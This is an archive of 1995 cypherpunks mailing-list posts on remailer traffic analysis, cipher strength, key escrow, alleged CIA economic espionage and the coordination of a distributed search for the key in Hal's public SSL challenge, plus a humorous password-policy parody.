>Is my math correct in surmising that chaining a message through five
>remailers, each with a reordering pool of five messages, could mean
>that the message eventually leaves the chain as one of 5^5 (3125)
>possible messages?  (My math is a bit weak, so please feel free to
>correct my methodology, if necessary.)  If so, does that work in
>reverse?  Could a given output message that finally surfaced in the
>clear be narrowed down to one of 3125 Mixmaster input messages
>through traffic analysis?  Or would the fact that the attacker
>didn't know the exact number of hops utilized significantly increase
>the odds against identifying the sender?  What effect, if any, would
>increasing the number of available remailers have on traffic
>analysis?

This is not quite correct, at each hop your message could have gone to any
remailer at all. There are now 16 Mixmaster remailers in operation. If you
have two good remailers in your chain (not run by the enemy), then a given
message into the system is probably one of the messages that emerges
between 10 Min and several hours later (with some complex probability
distribution over that time). Note that because of the way the reordering
is done, messages could stay in the pool forever, but this is exponentially
less likely with time.

It turns out that this is good security for one message, but is much less
secure if you continue to communicate with the same person for some time.
Then the attacker can look for correlations between your sending a message,
and everyone who receives them. After several messages in one month, you
will stand out, unless you send cover messages regularly, so you correlate
with everyone all the time (destroying any information about who you
actually correspond with). 

        -Lance
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMEVuSvPzr81BVjMVAQGDOAf/RnB3COZyT54zaPZea3dg3DvDRVWDXdTw
+vSlTdOO7Znu2EGy2hqr6hbXGFO6ExsR4ZbC/3q8WeBmATtFIkiFYbTGYR1E/plC
ujN6G33eCPJayFDQY3D9ETx5jXd0fYJl4O560zRrxWoK8bdD1E2RWeEKCt8ck3mm
B0apFL8M9Z5RuSmL4uke7/R3m8vXH2Iq3V28VUMSSIYyFb44ZDwjjaC35Yl91NZv
145QWv7DdyiZIr/nFgyIh+5jifuvynNNJVbIGWSH5WUevpmPTvCbwJSNnsXI78OO
uvFgQfupk1tMKbdRRHUofVoDCW1e5LuYieQwk7It2rW9wo63Bx1LUA==
=Hyma
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 31 Aug 95 01:14:31 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <ac6b1f9d03021004fa95@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:45 PM 8/30/95, Russell Nelson wrote:
>   Date: Wed, 30 Aug 1995 18:17:02 -0700
>
>Can't answer all of your questions, but I'll answer the ones I can,
>which will save time for someone else to answer the rest of them.
>
>   Apart from thwarting traffic analysis attacks, how does the security
>   of a Mixmaster Type II remailer packet compare to that of a
>   PGP-chained Type I message?
>
>Well, on the one hand, PGP uses IDEA, which is arguably better than
>triple-DES, but PGP also only uses the key length(s) of choice, which
>is to say that if you use the minimum length, you have very little
>security.  Also, Mixmaster packets remain the same length from hop to
>hop, so they are harder to track.

I am not sure this is the consensus opinion. Three key triple DES uses 168
bits of key, whereas IDEA only (only?!?) uses 128. DES is also much better
studied and understood. IDEA is still a young algorithm (though close to
the heart of every cypherpunk).

The rest of what you said looks good. Too bad I did not see it before I
typed my own answer ;)

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 31 Aug 95 02:33:01 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <199508310930.CAA18043@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> >It was said that Pres. Clinton had given a speech while 
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>> >said in this speech that obtaining  industrial 
>> >informations has the highest priority and this were the 
>> >new  task for the spies.

Did he really say the priority was stealing information from
other people, or only protecting Big American Companies from 
those nasty French Spy Agency persons?  (Clinton being who he is,
I'd expect him to say a politically correct version of the latter, 
whether he means the former or not, just like his predecessor.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org (Hallam@w3.org)
Date: Wed, 20 Sep 95 17:18:04 PDT
To: cypherpunks@toad.com
Subject: Re: Is the book Network Security any good?
Message-ID: <9509201546335370@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 95 22:53:49 -0400
From: hallam@w3.org


>Has anyone read the book "Network Security Private Communication in a 
>PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
>Speciner, and has a copyright date of this year.

Its pretty good on security and structure of protocols. Makes a good companion 
the Schneier book. I use it frequently.

It does have some very irritating assertions concerning ASN.1 however, 
specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1
to be far superior than the alternative suggested which is pure lossage. 
Lambasting the use of ASN.1 is fair game but arguments over wasted bytes miss t
point of ASN.1 and the BER encoding entirely.

It would make a usefull course book. 

        Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 31 Aug 95 02:58:25 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <199508310955.CAA19393@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 8/30/95 -0500, you wrote:
> In =any= Key Escrow arrangement (including the non-government variety 
> preferred by 4 out of 5 Cypherpunks in a recent survey) 
> there must be a division between encryption keys and signature keys.
....
> Please don't mention to anyone the fact that my signature key can be
> used to send me something that even the escrow agents can't read....

Only if you use RSA.  One of the neat things about RSA, as opposed to DH or 
DSA/DSS, is that the same algorithm can do both signature and encryption.

Once we all have our Gummint-issue Citizen-Unit SmartCards with the
Web-Of-Mistrust Hierarchical Certification System, 
people won't be able to use the DSS feature to send you encrypted messages 
        <fnord>Pay no attention to that man behind the subliminal
channel!</fnord>
but you can still use them for signatures, including checking escrow agency 
signatures on your privacy key.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 16:27:05 PDT
To: cypherpunks@toad.com
Subject: [COMP.SECURITY.UNIX] ADVICE ON PASSWORD SECURITY GUIDELINES
Message-ID: <9509201546345375@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 20:55:24 -0700
To: cypherpunks@toad.com
From: alano@teleport.com (Alan Olsen) (by way of Alan Olsen <alano@teleport.com
Subject: [comp.security.unix] Advice on password security guidelines

I found this on alt.humor.best-of.usenet.  It seemed like something that
would be appreciated here.  (And it is not that far off topic.)

Enjoy!

-----------------------------------------------------------

In alt.humor.best-of-usenet, Artur Pioro <artur@thp2.if.uj.edu.pl>
wrote:

>From: Paul Ashton <paul@argo.demon.co.uk>
>Newsgroups: comp.security.unix
>Subject: Advice on password security guidelines

>Hi,
>my boss has asked me for comments and improvements on his new password
>security policy. To me, it seems a bit severe. If anyone can offer any
>additional suggestions please do, here goes...

>For immediate issue:
>Password changing guidelines V2.2b

>Due to new security policies, the following guidelines have
>been issued to assist in choosing new passwords. Please follow
>them closely.

>Passwords must conform to at least 21 of the following attributes.

>1.  Minimum length 8 characters
>2.  Not in any dictionary.
>3.  No word or phrase bearing any connection to the holder.
>4.  Containing no characters in the ASCII character set.
>5.  No characters typeable on a Sun type 5 keyboard
>6.  No subset of one character or more must have appeared on
>    Usenet news, /dev/mem, rand(3), or the King James bible (version 0.1alpha)
>7.  Must be quantum theoretically secure, i.e. must automatically change
>    if observed (to protect against net sniffing).
>8.  Binary representation must not contain any of the sequences 00 01 10 11,
>    commonly known about in hacker circles.
>9.  Be provably different from all other passwords on the internet.
>10. Not be representable in any human language or written script.
>11. Colour passwords must use a minimum 32 bit pallette.
>12. Changed prior to every use.
>13. Resistant to revelation under threat of physical violence.
>14. Contain tissue samples of at least 3 vital organs.
>15. Incontravertible by OJ Simpsons lawyers.
>16. Undecodable by virtue of application of 0 way hash function.
>17. Odourless, silent, invisible, tasteless, weightless, shapeless, lacking
>    form and inert.
>18. Contain non-linear random S-boxes (without a backdoor).
>19. Self-escrowable to enable authorities to capture kiddie-porn people
>    and baddies but not the goodies ("but we'll only decode it with a
>    court order, honest").
>20. Not decryptable by exhaustive application of possible one time pads.

>Due to the severity of the restrictions, if the password is entered
>incorrectly 3 times at login time, you will be asked if you would like to
>pick a new one.

>Please add guidelines to the above and adjust the minimum conformation
>requirement, if applicable.

>--
>Moderators accept or reject articles based solely on the criteria posted
>in the Frequently Asked Questions. Article content is the responsibility
>of the submittor.  Submit articles to ahbou-sub@acpub.duke.edu. To write 
>to the moderators, send mail to ahbou-mod@acpub.duke.edu. 



|         Spam is the Devil's toothpaste!         | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Shamrock@netcom.com)
Date: Wed, 20 Sep 95 16:29:25 PDT
To: cypherpunks@toad.com
Subject: RE: NIST KEY ESCROW MEETING
Message-ID: <9509201546335369@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 19:58:52 -0800
To: cypherpunks@toad.com
From: shamrock@netcom.com (Lucky Green)
Subject: Re: NIST Key Escrow meeting

At 7:51 8/30/95, Flame Remailer wrote:
>Subject: NIST Key Escrow Meeting Discussion Papers
>
>Key Escrow Issues Meeting, September 6-7, 1995
>Discussion Paper #1

[Old and new GAK requirenments elided]
>With your input, we are hopeful that this effort will lead to
>definitive criteria, which will facilitate the development of
>exportable products and help minimize the time required to obtain
>export licenses.  The Administration seeks to finalize such
>criteria and make formal conforming modifications to the export
>regulations before the end of 1995.
>
>
>Note:  These issues will be discussed at the Key Escrow Issues
>Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
>the National Institute of Standards and Technology (Gaithersburg,
>Maryland).  The meeting will be open to the public, although
>seating is limited.  Advance registration is requested, please
>contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
>mail: carlton@micf.nist.gov.

Will any Cypherpunks attend this meeting? I sure hope we get to make our
ideas know.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 01:08:58 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: Is the book Network Security any good?
In-Reply-To: <9508310053.AA01365@cantina.verity.com>
Message-ID: <199508310807.EAA24230@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> Has anyone read the book "Network Security Private Communication in a 
> PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
> Speciner, and has a copyright date of this year.
> 
> Is it good?  What's the level?

I know a bit Charlie and have met Radia and they are both quite
smart. Word from third parties is that the book is good. I haven't
read it myself, though

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 31 Aug 95 01:17:56 PDT
To: hallam@w3.org
Subject: Re: Is the book Network Security any good?
In-Reply-To: <9508310253.AA09578@zorch.w3.org>
Message-ID: <199508310817.EAA24257@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> It does have some very irritating assertions concerning ASN.1
> however, specifically concerning its use in Kerberos. I consider
> Kerberos's use of ASN.1 to be far superior than the alternative
> suggested which is pure lossage.

I've heard people associated with the decision to use ASN.1 in
Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight
which should be exterminated from the planet.

But we agree that the book in question is mostly good...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 30 Aug 95 18:26:14 PDT
To: jya@pipeline.com
Subject: Re: CIA & Espionage
In-Reply-To: <199508301721.NAA10401@pipe4.nyc.pipeline.com>
Message-ID: <199508310125.EAA14438@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> >It was said that Pres. Clinton had given a speech while 
> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
> >said in this speech that obtaining  industrial 
> >informations has the highest priority and this were the 
> >new  task for the spies.

There was a fairly large article about this in Helsingin Sanomat, the
largest newspaper in Finland, some weeks ago.  It was quoted as being
originally from the New York Times.  (I have the clip saved at home
and can check the date if anyone is interested.)

I do find it rather shocking that the most powerful country in the
world sets industrial espionage as the primary task of their
intelligence services.

Now talking about those crypto restrictions worldwide and the real
reasons why the United States is driving them...

    Tatu Ylonen <ylo@cs.hut.fi>

--
International Cryptography Pages - check http://www.cs.hut.fi/ssh/crypto




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Thu, 31 Aug 95 01:28:00 PDT
To: cypherpunks@toad.com
Subject: Re: C2.ORG REMAILER
Message-ID: <9508310827.AA04419@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Sorry for my last empty message, it's late & i confuse
the "deliver" icon with the "mail format" icon (I was
attempting to change the type from NeXTmail to plain text)

I don't see why an anonymous remailer can't be set up in
some country with an inet connection, but with little
respect for idiocy originating from other countries
& in particular the US.

Allot of that issue is treaty dependent and that's probably what
people should look at. I like what people are doing well
enough, don't get me wrong. But the vulnerability exists via
co-operative law enforcment arrangments & legal venue operations.
That's the stuff of treaty's. I think probably an appropriate
place could be found & arranged with some effort at this point.

Hell there's GOT to be some countries out there that would have
little respect for the antics of the Church 'o Bucks who'd be
intrested in it.

Stick the database on an encrypted partition, and arrange a
a two party setup on the keys & administration and it'd make
them a damn bit harder to retrieve anyhow... "I'd comply,
but I don't have the keys, and the keyholder is refusing
contact. And NO I don't know his 'True Name' and can't find him."
That'd make things a tad rough, and isn't illigal anyplace
that I'm aware of.

Call it "Apllied Stenography" (Sorry about the pun, but I couldn't
resist it :>



Tim Scanlon




________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (Monty.harder@famend.com)
Date: Wed, 20 Sep 95 16:28:06 PDT
To: cypherpunks@toad.com
Subject: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <9509201546395394@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 30 Aug 95 23:50:00 -0500
Organization: The First Amendment BBS


  Regardless of whether Ito allows the tapes into evidence, the public
has heard a LEO matter-of-factly discussing the fabrication of evidence
against US citizens. We should take advantage of this, by connecting the
Fuhrman/Good Ole Boys from BFART bit, and GACK.

  If my private key must be escrowed with Lawn Forcement Agencies, the
very real possibility exists of a Fuhrman using it to forge evidence
against me. In =any= Key Escrow arrangement (including the non-
government variety preferred by 4 out of 5 Cypherpunks in a recent
survey) there must be a division between encryption keys and signature
keys.

  I recommend that anyone who will be using escrowed keys generate two
pairs: First, the signature key, including in the userid some kind of
[sig use] identifier (we should settle on a standard abbreviation for
this) follower by the encryption key. This way, when a person gets your
pubkeys, they get the encryption key =last=, which gets it searched
first whenever they PGP -e... something.

  Whatever arrangements are made for escrowing my encryption key,
=nobody= gets my signature key. If I am fired, quit, become brain
damaged or dead, my key can never be used by anyone to implicate me in
any criminal activity.



  Please don't mention to anyone the fact that my signature key can be
used to send me something that even the escrow agents can't read....






 *  
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 31 Aug 95 01:55:07 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Economic Espionage?
In-Reply-To: <ac6a9205000210049586@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950831032944.29233A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Timothy C. May wrote:

> Date: Wed, 30 Aug 1995 22:22:13 -0700
> From: Timothy C. May <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Economic Espionage?
> 
> At 1:25 AM 8/31/95, Tatu Ylonen wrote:
> >> >It was said that Pres. Clinton had given a speech while
> >> >visiting the  CIA HQ in Langley/Virginia. He allegedly
> >> >said in this speech that obtaining  industrial
> >> >informations has the highest priority and this were the
> >> >new  task for the spies.
> >
> >There was a fairly large article about this in Helsingin Sanomat, the
> >largest newspaper in Finland, some weeks ago.  It was quoted as being
> >originally from the New York Times.  (I have the clip saved at home
> >and can check the date if anyone is interested.)
> >
> >I do find it rather shocking that the most powerful country in the
> >world sets industrial espionage as the primary task of their
> >intelligence services.
> 
> What confirmation can you give us for this statement?

Primary task is indeed a bit of a stretch, but published and 
unpublished sources are floating about that it has become more of a 
focus.  You don't need an insider tip for that.

> 
> I'd like to see the actual comments, not just second-hand reports.
>

I've seen now three clippings posted or mentioned on the list.  Two with 
quotes.  This is hardly new.  It's been done and accepted in the 
intelligence community for quite some time.  It's getting press because 
it's new and trendy- and to some degree because there's an increased 
emphasis in the last few years.

> The issue of economic surveillance has come up several times, and I know of
> no formal policy to institute such a program.

A formal policy has exisited at CIA for over 2 years (I don't know how 
much over 2 years) now to collect industrial espionage and there is even a
desk which co-ordinates it.  I'll send you (in private e-mail) a name of an
attorney at CIA who will probably talk with you about the subject.  He's about
as open as CIA gets.

 The U.S., with generally
> multiple competitors in each market, would have a hard time figuring out
> who to tell "foreign secrets" to. Would Ford be told? Or just General
> Motors?

C'mon Mr. May.  We both know that that's hardly a hard decision.  Ford 
has been so cooperative with our endeavors of late, they will get the 
information way before GM will.

Seriously, what makes you think this is any less a political decision 
than the question of who to spy on?  You can't honestly believe that CIA 
or any other intelligence agency cares much about the equity of giving 
information to some parties and not others?  The information will go to 
who is currently on the "in" list, and those who are unlikely to spread 
the source of the sudden rash of contract bid victories.  Large U.S. 
corporations would do well to try to align themselves with the 
intelligence communities if they do much bidding against foreign firms.  

Try talking to the business intelligence people (who regularly debrief 
U.S. businessmen returning for foreign countries on a volunteer basis.)

If you play it right, my attorney friend will probably tell you a bit 
about the program.  Of course, I would appreciate it if you failed to 
mention me, though I doubt he'd know who "Black Unicorn" was anyhow.  
(Justification for pseudonyms 'punks)

>What about companies with operations in multiple countries?

Depends on:

1. The amount of espionage activity in a given country.
2. The amount of cooperation between CIA and the company in question.

> 
> Former DIRNSA (Director of the NSA) William Odom has said repeatedly that
> economic espionage cannot plausibly be a central task of the NSA.
> 

Mostly because the NSA's primary goal is large scale sigint and cryptography 
and these are less useful than humint in industrial espionage. 

C'mon Mr. May, this is basic divide and deny / plausible deniability 
here.  Since the NSA doesn't make it a central task, none of the 
intelligence agencies do?

(I'm constructing humint to include installing a tap on a single phone 
outside the negotiating room and such.)  These are not tasks for the NSA but
for an agency with extensive field operatives and flexibility, which the NSA 
lacks.  Also note that the NSA is so heavily geared for diplomatic 
interception.

I think this list sufferes a great deal from its arrogance in assuming 
the NSA is really as interested in U.S. citizens as the list would
like to suppose.  NSA makes a wonderful threat model, but like all good threat
models, it is at the extreme to very extreme end.  Does the NSA cooperate 
with federal law enforcement and other domestic activites?   Sure.  Is it 
more than a side project here and there - not really.  Does it care much 
about Industrial Espionage?  Not unless the CIA asks for sigint on 
industrial targets.

> Before anyone accuses me of being an apologist for the NSA (usually these
> claims arrive anonymously),

I won't, but they seem to have thrown you for a loop through a 
combination of an over-estimation on your part of their function and 
an over-extending of the reach of their denial.

> I've been looking for evidence of an economic
> intelligence role or mission of the U.S. intelligence agencies for more
> than 7 years.

You've been looking too early, and when you've looked early, you've 
looked for too big.  When was the last intelligence SUCCESS you have 
read about?  They don't do everything wrong.  In any event, no one 
thought it was a good idea (on a major scale anyhow) up to a pair of years ago
or so.  Bush proposed it at one time casually and was delt a backhand 
rather quickly.  I remember an article in the NYT about it written back 
just before he left CIA.  Of course this really meant that they had been doing
more and more of it and were looking to cover even more significant 
activities.  Japan was the trendy target then.

I suggest you concentrate your interest on the business intelligence 
program which has been talking to U.S. businessmen who travel abroad for 
some 10 years, and really uped the ante these last two.  Look also at 
documents listed in "Former Secrets:  Government Records Made Public 
Through the Freedom of Information Act."  (E. Hendricks)  or "Center for 
National Security Studies, From Official Files: Abstracts of Documents on 
National Security and Civil Liberties."  A great resource is also the 
National Security Archive in Washington, D.C.  (Scott Armstrong of the 
Washington Post is a co-founder)

The sugar industry is another nice place to take a look.

> 
> Let's see some evidence.
>

Ask yourself which companies have close relations with the CIA in 
past/present.

IBM. (duh)

AT&T.  (Check the connection with the recently floundering Mexician 
Telecom companies).  See _U.S. v. Americian Telephone and Telegraph Co._,
551 F.2d 384 (1976);  _U.S. v. (AT&T)_, 567 F.2d 121 (1977) for a nice idea
of the long term relationship between AT&T and CIA. 

e-systems wins contracts all the time.  Look there.  They're publicly 
held, ask for a prospectus and see what public foreign contracts they've 
announced of late.  There's your starting list of past industrial espionage 
targets.

It's not all that hard.  95% of intelligence information is 
available publicly, and maybe 10% of it is available in the newspapers.  



> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Thu, 31 Aug 95 04:24:22 PDT
To: cypherpunks@toad.com
Subject: Re: SSL search attack
Message-ID: <199508311118.FAA00515@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
>So T.C.May is the same person as "Lance"?
Hey, I wanna be Lance tooooooo. Can I be Lance? Can I?


From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>

>Each client could pick a segment at random, check it and then broadcast
>a NAK. Other clients would then know that the segment in question has
>been done, and avoid picking it in the future. If you are worried about

That opens it wide open to someone NAKing the keyspace where the key is.
If we're going to involve a server, might as well do the sequential job
and make it fast.


From: monty.harder@famend.com (MONTY HARDER)

TC> * For opportunistic attacks on keys in challenges, the odds are 95% that a
TC> key will be found with only twice the total effort (or time) using a
TC> totally random method of picking up keyspace to search.

>  The odds can be improved somewhat by scaling the granularity of the
>sweep to the size of the sweep. (Align larger chunks on large-chunk
>boundaries, eliminating the chance of overlap with other large chunks.)

Some kind of step (ie, round-down) function performed on the random (I
vote we call it a dart) output, with the size of the step based on the how
many segments at once you want to search? Seems to me that all your doing 
is searching an X segment area around where the dart hit. In order to
get any kind of boundry, you have to scale the allowed segment blocks, by 
powers of two, for example, or something, so everyone knows where the 
borders are. Its a nice thought but I don't see that it's necessary.

If, on the other hand, sequential searchers plow through half of the
keyspace while a "random crew" throws darts at the other half, everyone
can participate how they wish. And if the keyserver gets deep-six'd by a
Denial of Service attack (or just swamped), everyone can just switch into
random mode and shotgun the keyspace. (Maybe even avoiding what's already 
been sequentially-searched)

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEWZ6MLa+QKZS485AQGg3AMApFhrOBURkmwJQ699IkBhlZao6ynLe4pW
8eJllDAutliFdzGWA/PYHrfYsO8Dl9IOYrzFCmdNJY5urON3/IeOv5eEGqGkc/N6
3ZaKR4FIBk8jk0u6QGxi/iRfPfSa62gp
=it70
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:55:13 PDT
To: cypherpunks@toad.com
Subject: ECONOMIC ESPIONAGE?
Message-ID: <9509201546345376@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 30 Aug 1995 22:22:13 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Economic Espionage?

At 1:25 AM 8/31/95, Tatu Ylonen wrote:
>> >It was said that Pres. Clinton had given a speech while
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly
>> >said in this speech that obtaining  industrial
>> >informations has the highest priority and this were the
>> >new  task for the spies.
>
>There was a fairly large article about this in Helsingin Sanomat, the
>largest newspaper in Finland, some weeks ago.  It was quoted as being
>originally from the New York Times.  (I have the clip saved at home
>and can check the date if anyone is interested.)
>
>I do find it rather shocking that the most powerful country in the
>world sets industrial espionage as the primary task of their
>intelligence services.

What confirmation can you give us for this statement?

I'd like to see the actual comments, not just second-hand reports.

The issue of economic surveillance has come up several times, and I know of
no formal policy to institute such a program. The U.S., with generally
multiple competitors in each market, would have a hard time figuring out
who to tell "foreign secrets" to. Would Ford be told? Or just General
Motors? What about companies with operations in multiple countries?

Former DIRNSA (Director of the NSA) William Odom has said repeatedly that
economic espionage cannot plausibly be a central task of the NSA.

Before anyone accuses me of being an apologist for the NSA (usually these
claims arrive anonymously), I've been looking for evidence of an economic
intelligence role or mission of the U.S. intelligence agencies for more
than 7 years.

Let's see some evidence.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: piete.brooks@cl.cam.ac.uk (Piete.brooks@cl.cam.ac.uk)
Date: Wed, 20 Sep 95 16:55:46 PDT
To: cypherpunks@toad.com
Subject: Article in the Guardian (UK) about Hal2 not bad ....
Message-ID: <9509201546385387@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 31 Aug 1995 08:00:07 +0100
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>

An article by Azeem Azhar on page three of today's "The Guardian Online"
(he tells me it is available only in paper form !) is fairly positive.
He puts over the main point: "since US government regulations prevent the
export of software that uses stronger cryptographic techniques".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 30 Aug 95 23:35:47 PDT
To: don@cs.byu.edu
Subject: Re: SSL search attack
In-Reply-To: <199508302142.PAA00178@wero>
Message-ID: <"swan.cl.cam.:108150:950831063347"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Problem is, though, if *each* segment is shuffled, or shuffled in groups
> of 10 or 25 or 50 or what? brutessl is designed for sequential search
> through a block of segments. I was pulling down blocks of up to 40 segments 
> each, for each machine I was running. Of course, with brloop running I
> won't be in such a bind (I have yet to see that it really works though..)
> but still it also represents a coding problem as to handing out sequential
> segments within shuffled blocks.

My view is that IFF this becomes a problem, I'll do something to fix it.
I can do it in the server (under my control) after a complete scan has been
completed without finding the key.

It may mean you only get smaller blocks, but IFF we get that far, tough !

> Hey, by the way Piete, is there gonna be a ego list (rankings) like there
> was with the RC4? 

Err -- look on http://www.brute.cl.cam.ac.uk/brute/ -- follow CRACKED and then
look at:

	Credits are available as plain text and as a table (needs a browser
	which supports tables !).

"plain text" is <PRE> while "table" needs a fancy browser.


PS: I am working on beloop and brclient still, based on comments.
    brclient now uses early binding on the project, reducing traffic.
    brloop now has -h and -i flags, and a "-a" flag to create a .brloop.rc
    If allowed, it will log allocated and ACKed keys
    I have a "Local CPU Farm" slave server available
    Kevin <kwang@blackbox.punk.net> is working on a central server to "rsh"
	work to local CPUs.
    I am against pre-fetching of the next chunk, as I believe it should not be
	necessary (I'll review that after Hal3) and it tends to increase NOACKs


BTW: you make the 1% (of the TOTAL keyspace) cut :-)

              Credits for the CRACK of Hal's Second Challenge (plain) (p1 of 3)

            CREDITS FOR THE CRACK OF HAL'S SECOND CHALLENGE (PLAIN)

   Note that thet %age is the percentage of the complete address space.

